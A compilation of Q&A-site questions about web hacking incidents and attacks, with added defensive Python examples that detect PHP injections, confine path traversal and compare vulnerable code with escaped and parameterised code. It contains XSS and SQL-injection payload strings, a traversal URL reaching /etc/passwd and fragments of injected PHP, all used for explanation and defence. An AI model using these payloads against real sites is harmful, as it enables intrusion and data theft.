hacking

Good ethical hacking book

What is the best book to start learning ethical hacking? ...

Session Hijacking in practice

I have been reading up on session fixation/hijacking recently, and understand the theory. What I don't understand is how this would be exploited in practice. Would you have to tamper with your browser to make use of the stolen cookies? Append it to the URL and pass it to the web application? Or would you write some sort of custom script ...

From the perspective of an ASP.NET web form, can the Request.UserHostAddress be trusted?

I have a web form that needs to act differently if the request to that form came from an internal network address or from a public IP address. I'm trying within my web form to determine if the request is from an internal network IP. Can I reliably do this, or can clients fake their source IP? Can I trust the information contained in R...

A bot to access data on a grid of a Windows application (like a human)

I'm so desperate to use a VPN application. In this app there are some limitations that I've found no solutions for; for example, multiple users can connect to the VPN server using one username at the same time. In order to stop that I have to look at the 'connected VPN clients' and see if a username exists more than once and then disc...

URL-based JavaScript to show all variables in the page

Hi, I've seen JavaScript (and written some too) to show the contents of input tags (useful if the guy before you left a password in an input...), but I want to use JS to show the JavaScript variables that exist in the page. The reason I want to do this is because I want to check out a file sharing site to see if it's real or just a roo...

bootstrap(index.php) "viagra" hack

OK... so most of the sites we were serving were down, parsing errors in the index.php file... looking at the file, our previous versions of the said file were prepended with: <?php @register_shutdown_function("__sfd1260709780__");function __sfd1260709780__() { global $__sdv1260709780__; if (!empty($__sdv1260709780__)) return; $__sdv126070...

Odd code added just before close body tag

My client is reporting that code looking like this has been automatically added to the end of all PHP files (just before the close body tag): <b1><!--J5qN2aS2eNoNycENgCAMAMCNqEoUnYZA04DRUgI1rC+f+xxwUdDQEuliwe5u3U+wzm3HBWMMkxpR0Qnmr2E2KAyDIqAUnQGM3H0NiXwUed67q6m5/t4jHpA=--></b1> He tried manually deleting that line, but of course it re...
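An added example (not code from this post or the "viagra" one above) that scans a PHP tree for the two shapes of injection the two posts describe: an obfuscated `register_shutdown_function()` hook prepended to a file, and a long base64 run inside an HTML comment just before `</body>`. The sample files are constructed: they copy the shape of the quoted fragments (the `__sfd1260709780__` name, the comment blob) with placeholder bodies, not the real injected code.

```python
"""Scan PHP files for the two injection patterns described above.

Added example, not from either post. The sample file contents are
constructed to mirror the fragments quoted in the questions; the payload
bodies are placeholders, not the real injected code.
"""
import base64
import binascii
import re
import tempfile
from pathlib import Path

# "<?php @register_shutdown_function("__sfd1260709780__"); ..." at file start.
SHUTDOWN_HOOK = re.compile(
    r"register_shutdown_function\(\s*['\"](__\w+\d+__)['\"]\s*\)"
)
# A comment whose entire content is one long base64 run: no words, no spaces.
B64_COMMENT = re.compile(r"<!--([A-Za-z0-9+/=]{40,})-->")
BODY_CLOSE = re.compile(r"</body>", re.IGNORECASE)


def scan_source(text):
    """Return a list of (kind, detail) findings for one file's contents."""
    findings = []
    head = text[:512]
    m = SHUTDOWN_HOOK.search(head)
    if head.lstrip().startswith("<?php") and m:
        findings.append(("prepended_shutdown_hook", m.group(1)))
    for m in B64_COMMENT.finditer(text):
        blob = m.group(1)
        try:
            base64.b64decode(blob, validate=True)
            decodes = True
        except binascii.Error:
            decodes = False
        close = BODY_CLOSE.search(text, m.end())
        findings.append(("base64_comment", {
            "length": len(blob),
            "valid_base64": decodes,
            "before_body_close": close is not None and close.start() - m.end() < 64,
        }))
    return findings


def scan_tree(root):
    """Map relative path -> findings for every *.php under root with a hit."""
    root = Path(root)
    results = {}
    for path in root.rglob("*.php"):
        hits = scan_source(path.read_text(errors="replace"))
        if hits:
            results[str(path.relative_to(root))] = hits
    return results


# Constructed samples mirroring the two posts (placeholder payloads).
SAMPLE_INDEX = (
    '<?php @register_shutdown_function("__sfd1260709780__");'
    'function __sfd1260709780__() { /* obfuscated payload placeholder */ } ?>\n'
    '<?php require "bootstrap.php"; ?>\n'
)
SAMPLE_PAGE = (
    "<html><body>\n<p>hello</p>\n"
    "<b1><!--" + base64.b64encode(b"placeholder payload " * 4).decode() + "--></b1>\n"
    "</body></html>\n"
)
SAMPLE_CLEAN = "<?php echo 'ok'; ?>\n<html><body><!-- nav --></body></html>\n"


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text(SAMPLE_INDEX)
        (root / "page.php").write_text(SAMPLE_PAGE)
        (root / "clean.php").write_text(SAMPLE_CLEAN)
        return scan_tree(root)


if __name__ == "__main__":
    for path, hits in demo().items():
        print(path, hits)
```

Finding the modified files is only the first step: as the post says, deleting the line does not help while whatever writes it (a cron entry, a remaining web shell, a compromised FTP password) still runs, so the scan is worth re-running after each cleanup to confirm nothing comes back.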

Protecting strings within a Delphi application

We have a Delphi 2006 application that drives a MS SQL Server database. We have found a vulnerability where it is possible to load the executable into a hex editor and modify the SQL. Our long term plan is to move this SQL to CLR stored procedures but this is some way off since many of our clients still use SQL 2000. We've thought ab...

Hooking DirectX EndScene from an injected DLL

I want to detour EndScene from an arbitrary DirectX 9 application to create a small overlay. As an example, you could take the frame counter overlay of FRAPS, which is shown in games when activated. I know the following methods to do this: Creating a new d3d9.dll, which is then copied to the games path. Since the current folder is sea...

Is it possible to spoof a session with JavaScript + Cookies?

Suppose you have a webapp that gives users their own site on a subdomain (e.g. awesome.super-cms.com) and that you let them edit HTML. Further assume that you're setting the SessionID in a wildcard subdomain cookie ("*.super-cms.com"). The user who manages evil.super-cms.com could easily write a JavaScript that grabs the SessionID from o...
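An added example (not part of the question) that models the browser's cookie-scoping rule with the standard-library cookie jar: a cookie set with `Domain=.super-cms.com` is attached to requests for every tenant subdomain, including evil.super-cms.com, whereas a host-only cookie (no `Domain` attribute) stays on the host that set it. The host names follow the question; the cookie names and values are assumptions.

```python
"""How a Domain=.super-cms.com cookie reaches every tenant subdomain.

Added example, not from the original question; it models the browser's
cookie-scoping rules with http.cookiejar. Host names follow the
question; cookie names and values are assumptions.
"""
import urllib.request
from http.cookiejar import Cookie, CookieJar


def make_cookie(name, value, domain):
    """Build a cookie the way a Set-Cookie with the given Domain would."""
    domain_specified = domain.startswith(".")  # leading dot: Domain attribute present
    return Cookie(
        version=0, name=name, value=value, port=None, port_specified=False,
        domain=domain, domain_specified=domain_specified,
        domain_initial_dot=domain_specified, path="/", path_specified=True,
        secure=False, expires=None, discard=True, comment=None,
        comment_url=None, rest={"HttpOnly": None}, rfc2109=False,
    )


def cookies_sent_to(jar, url):
    """Return {name: value} for the cookies the jar attaches to a request for url."""
    req = urllib.request.Request(url)
    jar.add_cookie_header(req)
    header = req.get_header("Cookie", "")
    return dict(p.strip().split("=", 1) for p in header.split(";") if p.strip())


def demo():
    jar = CookieJar()
    # Wildcard-scoped session cookie, as described in the question.
    jar.set_cookie(make_cookie("SessionID", "abc123", ".super-cms.com"))
    # Host-only cookie: set by www.super-cms.com without a Domain attribute.
    jar.set_cookie(make_cookie("HostOnlySession", "xyz789", "www.super-cms.com"))
    hosts = ("www.super-cms.com", "awesome.super-cms.com", "evil.super-cms.com")
    return {host: cookies_sent_to(jar, f"http://{host}/") for host in hosts}


if __name__ == "__main__":
    for host, cookies in demo().items():
        print(host, cookies)
```

Note that `HttpOnly` does not close this hole: the JavaScript on evil.super-cms.com cannot read the cookie, but the browser still sends it with every request to evil.super-cms.com, so that tenant's server sees it in the `Cookie` header anyway. The fix is scoping: keep the session cookie host-only on the parent site, and put user-controlled content on a separate registrable domain rather than a subdomain.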

PHP - writing data to a file with 777 permission

I have a .TXT file on a web server with the permissions 777. So what are the chances that others might be able to edit the content of this file? The content is not much - just a number. Someone seems to have been tinkering with this file as the number vanished the other day! No one else except me has the FTP password. So I was wonderi...

cell phone hacking (as in engineering hack)

Hi. My apologies right away if it is not really a programming-related question. I have a (crazy?) idea of using the cellphone voice channel as a remote control channel for RC models/drones. In principle, if it is doable, it should increase the range a lot. Data channels on most cell phone companies are more expensive than pure voice chan...

Strange Value in EXE header!

I've seen a strange value placed in an EXE header:
00000000: 4D 5A 90 00 03 00 00 00 - 04 00 00 00 FF FF 00 00
00000010: B8 00 00 00 00 00 00 00 - 40 00 00 00 00 00 00 00
00000020: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
00000030: 00 00 00 00 00 00 00 00 - 00 00 00 00 A8 00 00 00
00000030: 00 00 00 00 00 00 00 00 - 00 00 00 00 A...
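An added example (not part of the question) that parses the 64 bytes shown as an IMAGE_DOS_HEADER. The dump is the standard DOS header emitted by Microsoft's linker, and the value at offset 0x3C, `A8 00 00 00`, is `e_lfanew`: the file offset of the `PE\0\0` signature that follows the DOS stub. `SAMPLE_HEADER` is the question's dump (offsets 0x00 to 0x3F) re-entered as bytes.

```python
"""Parse the 64-byte IMAGE_DOS_HEADER shown in the question.

Added example, not from the original question. SAMPLE_HEADER is the
dump from the question (offsets 0x00-0x3F) re-entered as bytes.
"""
import struct

DOS_HEADER_FMT = "<2s13H4H2H10HI"  # 64 bytes, little-endian
FIELDS = ("e_magic", "e_cblp", "e_cp", "e_crlc", "e_cparhdr", "e_minalloc",
          "e_maxalloc", "e_ss", "e_sp", "e_csum", "e_ip", "e_cs",
          "e_lfarlc", "e_ovno")

SAMPLE_HEADER = bytes.fromhex(
    "4D5A9000" "03000000" "04000000" "FFFF0000"  # 0x00: MZ, cblp, cp, crlc, cparhdr, minalloc, maxalloc, ss
    "B8000000" "00000000" "40000000" "00000000"  # 0x10: sp, csum, ip, cs, lfarlc, ovno, e_res[0..1]
    "00000000" "00000000" "00000000" "00000000"  # 0x20: e_res[2..3], oemid, oeminfo, e_res2[0..3]
    "00000000" "00000000" "00000000" "A8000000"  # 0x30: e_res2[4..9], e_lfanew
)


def parse_dos_header(data):
    """Unpack IMAGE_DOS_HEADER into a dict; raises on short or non-MZ input."""
    size = struct.calcsize(DOS_HEADER_FMT)
    if len(data) < size:
        raise ValueError(f"need at least {size} bytes, got {len(data)}")
    vals = struct.unpack_from(DOS_HEADER_FMT, data, 0)
    if vals[0] != b"MZ":
        raise ValueError("missing MZ signature")
    hdr = dict(zip(FIELDS, vals[:14]))
    hdr["e_res"] = vals[14:18]
    hdr["e_oemid"], hdr["e_oeminfo"] = vals[18:20]
    hdr["e_res2"] = vals[20:30]
    hdr["e_lfanew"] = vals[30]
    return hdr


def describe(data):
    """Explain the layout implied by the header: where the stub and PE header are."""
    hdr = parse_dos_header(data)
    header_bytes = hdr["e_cparhdr"] * 16          # header size in 16-byte paragraphs
    lfanew = hdr["e_lfanew"]
    sig = data[lfanew:lfanew + 4] if len(data) >= lfanew + 4 else None
    return {
        "dos_header_bytes": header_bytes,          # 4 paragraphs = 64 bytes
        "relocation_table_offset": hdr["e_lfarlc"],  # 0x40: no DOS relocations, stub starts here
        "dos_stub_bytes": lfanew - header_bytes,   # the "This program cannot be run in DOS mode" stub
        "pe_header_offset": lfanew,                # the "strange" 0xA8 at offset 0x3C
        "pe_signature": sig,                       # b"PE\0\0" expected; None if data is too short
        "pe_signature_ok": (sig == b"PE\x00\x00") if sig is not None else None,
    }


if __name__ == "__main__":
    print(parse_dos_header(SAMPLE_HEADER))
    print(describe(SAMPLE_HEADER))
```

Everything before `e_lfanew` is the DOS-era header (initial SS:SP of 0:0xB8, four paragraphs of header, relocations at 0x40) and is identical across most Windows executables; the value that varies is `e_lfanew`, which is why loaders and packers key on it. A malformed `e_lfanew` that points outside the file, or at something other than `PE\0\0`, is what an integrity check should reject.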

How can I avoid SQL injection attacks?

Yesterday I was speaking with a developer, and he mentioned something about restricting the insertions on database fields, like strings such as -- (minus minus). At the same time, what I know is that it is a good approach to escape HTML chars like <, > etc., not --. Is this true? Do I have to worry about --, ++? Is it more like a myth or ol...

Hooking str.__getitem__ in Python

Is there a way of hooking str.__getitem__? Example: I'd like to be able to do: >>> "this is a string"[[1,3,4]] 'hs ' passing a list to [] and getting the items in that list. A more realistic example: class STR(str): pass class INT(int): pass It's easy to make STR("a string")[1] or STR("a string")[INT(1)] return an S...

java ternary hack

So I'm not going for maintainability or elegance here.. looking for a way to cut down on the total tokens in a method just for fun. The method is comprised of a long nested if-else construct and I've found that (I think) the way to do it with the fewest tokens is the ternary operator. Essentially, I translate this: String method(param) ...

Do any real-world CPUs not use IEEE 754?

I'm optimizing a sorting function for a numerics/statistics library based on the assumption that, after filtering out any NaNs and doing a little bit twiddling, floats can be compared as 32-bit ints without changing the result and doubles can be compared as 64-bit ints. This seems to speed up sorting these arrays by somewhere on the ord...
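An added example (not part of the question) of the bit twiddling the question alludes to: after filtering NaNs, an IEEE 754 float can be mapped to an unsigned integer whose order matches numeric order. Positive values already compare correctly as raw bits; negative values sort the wrong way round, so their bits are inverted. The check at the end sorts random and edge-case values both ways and compares.

```python
"""Order-preserving integer keys for IEEE 754 floats.

Added example, not from the original question. Shows the bit twiddling
for both binary64 and binary32 and checks that sorting by the integer
key gives the same order as sorting the floats (NaNs excluded, as the
question assumes).
"""
import math
import random
import struct


def _int_key(bits, width):
    """Transform raw IEEE bits so unsigned integer order == numeric order."""
    sign = 1 << (width - 1)
    mask = (1 << width) - 1
    if bits & sign:
        # Negative: the raw pattern grows with magnitude, i.e. the wrong way,
        # so flip every bit (this also clears the sign bit, placing negatives
        # below all positives).
        return bits ^ mask
    # Positive: set the sign bit so positives sit above all negatives.
    return bits | sign


def double_key(x):
    return _int_key(struct.unpack("<Q", struct.pack("<d", x))[0], 64)


def single_key(x):
    return _int_key(struct.unpack("<I", struct.pack("<f", x))[0], 32)


def to_single(x):
    """Round a Python float to the nearest binary32 value."""
    return struct.unpack("<f", struct.pack("<f", x))[0]


def order_preserved(values, key):
    """True if sorting by key reproduces the numeric sort of values."""
    values = [v for v in values if not math.isnan(v)]
    return sorted(values, key=key) == sorted(values)


# Constructed edge cases: infinities, both zeros, subnormals, extremes.
EDGE_CASES = [math.inf, -math.inf, 0.0, -0.0, 1.0, -1.0, 5e-324, -5e-324,
              1.7976931348623157e308, -1.7976931348623157e308, 1e-300, 2.5, -2.5]


def self_check(n=2000, seed=1):
    rng = random.Random(seed)
    doubles = EDGE_CASES + [rng.uniform(-1e6, 1e6) for _ in range(n)]
    # binary32 cannot hold 1e308; keep what fits (infinities pack fine).
    singles = [to_single(v) for v in doubles if abs(v) < 3e38 or math.isinf(v)]
    return order_preserved(doubles, double_key) and order_preserved(singles, single_key)


if __name__ == "__main__":
    print(self_check())
```

Two caveats a sort based on this must handle: -0.0 and +0.0 get different keys although they compare equal (harmless for ordering, but they are not interchangeable as sort keys), and a NaN has an exponent of all ones with a non-zero mantissa, so it would land above +inf or below -inf depending on its sign bit rather than being "unordered"; filtering NaNs first, as the question does, is what makes the trick valid.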

Using directory traversal attack to execute commands

Is there a way to execute commands using directory traversal attacks? For instance, I access a server's etc/passwd file like this http://server.com/..%01/..%01/..%01//etc/passwd Is there a way to run a command instead? Like... http://server.com/..%01/..%01/..%01//ls ..... and get an output? EDIT: To be clear here, I've found the ...
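An added example (not part of the question) of the server-side check that closes the traversal shown: decode the request path once, refuse control bytes such as the `%01` in the question outright, resolve the result under the document root and confirm it is still inside. `WEB_ROOT` and the sample requests are assumptions; `os.path.abspath` is used so the check runs without the files existing, whereas a live server should resolve with `os.path.realpath` so symlinks cannot escape either.

```python
"""Confine a requested URL path to the document root.

Added example, not from the original question. WEB_ROOT and the sample
requests are assumptions. abspath is used so this runs without the
files existing; on a live server use realpath as well, so that a symlink
inside the root cannot point outside it.
"""
import os
import urllib.parse

WEB_ROOT = "/var/www/html"  # assumed document root


def resolve_under_root(root, requested):
    """Return the filesystem path for requested, or None if it leaves root."""
    decoded = urllib.parse.unquote(requested)      # decode exactly once
    # Control bytes (%00..%1f, %7f) never belong in a path; the ..%01 trick
    # from the question relies on a server mis-handling such a byte.
    if any(ord(c) < 0x20 or c == "\x7f" for c in decoded):
        return None
    root_abs = os.path.abspath(root)
    candidate = os.path.abspath(os.path.join(root_abs, decoded.lstrip("/")))
    # commonpath is root itself only if candidate is root or below it.
    if os.path.commonpath([root_abs, candidate]) != root_abs:
        return None
    return candidate


# Constructed requests: benign, classic traversal, encoded traversal, the
# question's control-byte variant, and a dotdot that stays inside root.
SAMPLE_REQUESTS = [
    "/index.html",
    "/../../../etc/passwd",
    "/..%2f..%2f..%2fetc/passwd",
    "/%2e%2e/%2e%2e/etc/passwd",
    "/..%01/..%01/..%01//etc/passwd",
    "/images/../index.html",
]


def classify(root, requests):
    """Map each request to its resolved path or None (rejected)."""
    return {r: resolve_under_root(root, r) for r in requests}


if __name__ == "__main__":
    for req, path in classify(WEB_ROOT, SAMPLE_REQUESTS).items():
        print(f"{req!r:40} -> {path}")
```

Decoding once matters in both directions: decoding twice would turn `%252e%252e` into `..` after the check had already passed, while not decoding at all would let `%2e%2e` through to a filesystem layer that never sees dots. On Windows, `os.path.abspath` also normalises backslashes, which is why the check is done on the normalised candidate rather than on the raw string.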

Can an attacker take advantage of HTML tag injection in request parameters?

Say I have a web application that accepts a parameter called "content". Whatever is present in this parameter will be output as a part of the HTML response. Example JSP code: <%= request.getParameter("content") %> I know this is silly and it should be sanitized and so on, but my question is if an attacker can actually take advantage ...
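An added example (not the JSP from the question) showing what an attacker gains from an unescaped parameter: in element text a new `<script>` element, and inside a quoted attribute a new event-handler attribute, neither of which exists in the template. The two templates are constructed stand-ins for `<%= request.getParameter("content") %>` in those two contexts; the check parses the rendered page and compares its tag and attribute structure with the template's.

```python
"""HTML injection from a reflected parameter, and what escaping changes.

Added example, not the JSP from the original question. The two templates
are constructed stand-ins for <%= request.getParameter("content") %>
placed in element text and inside a quoted attribute.
"""
import html
from html.parser import HTMLParser

TEMPLATE_TEXT = "<p>You searched for: {content}</p>"
TEMPLATE_ATTR = '<input name="q" value="{content}">'

PAYLOAD_TEXT = "<script>alert(1)</script>"          # new element in text context
PAYLOAD_ATTR = '" onfocus="alert(1)" autofocus="'   # breaks out of the attribute value


def render_vulnerable(template, content):
    """Equivalent of the JSP scriptlet: raw parameter into the response."""
    return template.format(content=content)


def render_escaped(template, content):
    # html.escape covers element text and quoted attribute values. Values
    # landing in JavaScript strings, URLs or CSS need their own encoders.
    return template.format(content=html.escape(content, quote=True))


class _Structure(HTMLParser):
    """Records (tag, attribute names) for every start tag a browser would see."""

    def __init__(self):
        super().__init__()
        self.items = []

    def handle_starttag(self, tag, attrs):
        self.items.append((tag, tuple(name for name, _ in attrs)))


def structure(markup):
    p = _Structure()
    p.feed(markup)
    p.close()
    return p.items


def injection_succeeded(template, content, renderer):
    """True if the parameter changed the tag/attribute structure of the page."""
    baseline = structure(template.format(content=""))
    return structure(renderer(template, content)) != baseline


if __name__ == "__main__":
    for tpl, payload in ((TEMPLATE_TEXT, PAYLOAD_TEXT), (TEMPLATE_ATTR, PAYLOAD_ATTR)):
        print(render_vulnerable(tpl, payload))
        print(" vulnerable:", injection_succeeded(tpl, payload, render_vulnerable))
        print(" escaped:   ", injection_succeeded(tpl, payload, render_escaped))
```

The attribute case is the one people miss: escaping only `<` and `>` leaves the `"` that ends the attribute value, so the hardened renderer escapes quotes too (`quote=True`). A reflected script runs with the origin of the vulnerable site, which is how the session-cookie theft in the questions above is typically done.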

Where to use mysql_real_escape_string to prevent SQL Injection?

Hi friends, I'm in trouble with a group of hackers. They hacked my client's site a few times, and my client is getting more angry :( My client lost his database (which has hundreds of records), and had to enter it all again :( Now I'm following some more instructions: fixed file permissions, changed FTP and host login info, cleared all remote MySQL acce...
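An added example (not code from this question or the `--` question above) covering both: a login query built by concatenation, the `--` blacklist the other question's developer suggested, and the parameterised form. It uses SQLite from the standard library rather than MySQL/PHP; the `users` rows are constructed sample data, and `sql_escape` emulates only the quote doubling that functions like `mysql_real_escape_string` perform, which is enough to show the case where escaping alone still fails.

```python
"""SQL injection: why blocking '--' is not a fix and parameters are.

Added example (SQLite via the standard library, not the MySQL/PHP code
from these questions). The users table is constructed sample data;
sql_escape emulates only quote doubling, an assumed simplification.
"""
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("alice", "s3cret", 0), ("admin", "hunter2", 1)])
    return conn


def login_vulnerable(conn, name, password):
    """String concatenation: the input becomes part of the SQL grammar."""
    sql = (f"SELECT name FROM users WHERE name = '{name}' "
           f"AND password = '{password}'")
    return [row[0] for row in conn.execute(sql)]


def login_blacklist(conn, name, password):
    """The '--' filter from the question: bypassed with quotes alone."""
    if "--" in name or "--" in password:
        raise ValueError("rejected by blacklist")
    return login_vulnerable(conn, name, password)


def login_safe(conn, name, password):
    """Parameterised query: values are bound, never parsed as SQL."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (name, password))]


def sql_escape(s):
    """Quote doubling only (SQLite's string escaping); assumed simplification."""
    return s.replace("'", "''")


def user_by_id_escaped(conn, user_id):
    """Escaped but unquoted: escaping does nothing outside a string literal."""
    sql = f"SELECT name FROM users WHERE rowid = {sql_escape(user_id)}"
    return [row[0] for row in conn.execute(sql)]


def user_by_id_safe(conn, user_id):
    """Bind the value and enforce its type; non-numeric input raises."""
    return [row[0] for row in conn.execute(
        "SELECT name FROM users WHERE rowid = ?", (int(user_id),))]


if __name__ == "__main__":
    conn = make_db()
    print(login_vulnerable(conn, "admin' --", "wrong"))        # comment trick
    print(login_blacklist(conn, "nobody", "' OR '1'='1"))      # no '--' needed
    print(login_safe(conn, "nobody", "' OR '1'='1"))           # empty
    print(user_by_id_escaped(conn, "1 OR 1=1"))                # escaping did not help
```

So, to the question of where to call `mysql_real_escape_string`: on every string value at the moment it is concatenated into a query, inside quotes, and never for numbers or identifiers. Because that discipline has to hold for every query on the site, prepared statements (`mysqli` or PDO with bound parameters) are the practical answer, and the `--` rule is neither necessary nor sufficient.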